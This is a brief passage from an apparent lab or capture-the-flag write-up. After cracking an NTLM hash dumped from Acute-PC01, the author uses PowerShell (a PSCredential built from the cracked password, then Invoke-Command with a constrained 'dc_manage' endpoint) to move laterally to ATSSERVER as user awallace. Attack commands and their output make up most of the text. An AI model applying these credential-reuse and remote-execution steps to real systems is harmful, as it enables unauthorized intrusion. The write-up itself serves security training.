awallace


Upon successfully compromising the Acute-PC01 host, I obtained the system hashes by leveraging administrator privileges. Subsequently, a single NTLM hash was successfully cracked, and this password will be subjected to testing for potential password reuse on the ATSSERVER host.

PS C:\Users\jmorgan\Documents> $Cred = New-Object System.Management.Automation.PSCredential("ACUTE.LOCAL\awallace", (ConvertTo-SecureString "Password@123" -AsPlainText -Force))

Creating a PSCredential object for the awallace user with the cracked password

PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ScriptBlock {whoami}
[ATSSERVER] Connecting to remote server ATSSERVER failed with the following error message : Access is denied. For more 
information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (ATSSERVER:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
 
 
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {whoami}
acute\awallace

The password is confirmed to belong to the awallace user while the user is still bound by the dc_manage configuration rule Lateral Movement made to the ATSSERVER host as the awallace user